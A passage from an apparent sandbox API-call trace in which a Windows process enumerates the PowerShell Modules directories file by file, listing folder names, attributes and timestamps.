lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0151.354] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0151.354] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0151.354] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0151.355] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0151.355] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0151.355] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0151.355] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0151.356] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0151.356] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0151.356] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0151.357] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0151.357] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0151.357] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0151.358] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0151.358] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0151.358] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0151.358] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0151.359] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0151.359] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0151.359] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0151.359] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0151.360] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0151.360] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0151.361] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0151.361] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0151.362] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0151.362] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0151.362] FindNextFileW (in: hFindFile=0x2386d3b4fb0, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.362] FindClose (in: hFindFile=0x2386d3b4fb0 | out: hFindFile=0x2386d3b4fb0) returned 1 [0151.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e340) returned 1 [0151.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0151.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e410) returned 1 [0151.365] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0151.365] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4710 [0151.366] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.367] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0151.367] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0151.368] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0151.368] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0151.368] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0151.368] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0151.369] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0151.369] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0151.369] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0151.370] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0151.370] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0151.371] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0151.371] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0151.371] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, 